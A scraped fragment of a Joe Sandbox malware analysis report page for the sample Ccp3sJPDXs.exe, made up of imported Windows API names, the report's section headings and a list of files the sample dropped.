TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ccp3sJPDXs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Media Player\7ff23c0364e747

C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe

C:\SavesHost\4c7dead769f9f6

C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat

C:\SavesHost\6kXFj.vbe

C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe

C:\SavesHost\91e168f4ec1147

C:\SavesHost\Blockbrowser.exe

C:\SavesHost\SgrmBroker.exe

C:\SavesHost\c84543c365d5e1

C:\Users\Public\Documents\0ZuAkTjxKX.exe

Windows Analysis Report
Ccp3sJPDXs.exe